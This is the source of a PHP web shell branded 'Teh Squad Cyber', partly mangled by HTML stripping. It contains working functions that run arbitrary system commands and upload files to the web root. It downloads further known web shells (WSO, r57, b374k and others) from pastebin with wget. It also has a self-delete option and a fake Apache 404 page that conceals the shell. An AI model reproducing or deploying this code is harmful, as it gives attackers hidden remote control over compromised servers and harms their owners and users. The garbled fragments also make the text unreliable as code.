Teh Squad Cyber
".$perm.""; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function sulap($text) { if(!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } error_reporting(E_ALL ^ (E_NOTICE | E_WARNING)); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; echo "
Server IP : ".gethostbyname($_SERVER['HTTP_HOST'])."
"; echo "
".php_uname()."

"; echo "Disable Functions: $show_ds

"; echo " H O M E K I L L  L O G O U T"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } echo""; echo"
"; echo"
"; echo""; echo" "; if(isset($_POST['enter'])) { if ($_POST['lucknut'] == 'wso_shell') { $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wsoshell.php'); if(file_exists('./wsoshell.php')){ echo '
wso.php upload sukses !
'; } else { echo '
gagal upload !
'; } }elseif($_POST['shell'] == 'idx') { $exec=exec('wget http://pastebin.com/raw.php?i=nC6pWh5a -O idx.php'); if(file_exists('./idx.php')){ echo '
idx.php upload sukses !
'; } else { echo '
Failed!
'; } }elseif($_POST['shell'] == 'r57') { $exec=exec('wget http://pastebin.com/raw.php?i=S9tzBgg3 -O r57.php'); if(file_exists('./r57.php')){ echo '
r57.php upload sukses !
'; } else { echo '
Failed!
'; } }elseif($_POST['shell'] == 'wso') { $exec=exec('wget http://pastebin.com/raw.php?i=N0eh3Q7Y -O wso.php'); if(file_exists('./wsp.php')){ echo '
wso.php upload sukses !
'; } else { echo '
Failed!
'; } }elseif($_POST['shell'] == 'b374k') { $exec=exec('wget http://pastebin.com/raw.php?i=cR71LiMp -O b374k.php'); if(file_exists('./b374k.php')){ echo '
b374k.php upload sukses !
'; } else { echo '
Failed!
'; } }elseif($_POST['shell'] == 'sadrazam') { $exec=exec('wget http://pastebin.com/raw.php?i=xjKrnnBD -O sadrazam.php'); if(file_exists('./sadrazam.php')){ echo '
sadrazam.php upload sukses !
'; } else { echo '
Failed!
'; } }elseif($_POST['shell'] == 'blackhat') { $exec=exec('wget http://pastebin.com/raw.php?i=3L2ESWeu -O bh.php'); if(file_exists('./bh.php')){ echo '
bh.php upload sukses !
'; } else { echo '
Failed!
'; } }elseif($_POST['shell'] == 'noname') { $exec=exec('wget http://pastebin.com/raw.php?i=BRCmf02c -O noname.php'); if(file_exists('./noname.php')){ echo '
noname.php upload sukses !
'; } else { echo '
Failed!
'; } } } } elseif($_GET['bye'] == 'logout') { echo ''; unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo 'Good Bye!!'; } elseif($_GET['c7e'] == 'kill') { if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('

Shell removed


Goodbye , Thanks for take my shell today
'); else echo '
unlink failed!
'; } else{ echo " 404 Not Found

Not Found

The requested URL "; echo $_SERVER['REQUEST_URI']; echo " was not found on this server.
"; echo "
Apache Server at ".$_SERVER['HTTP_HOST']." Port 80
"; } ?>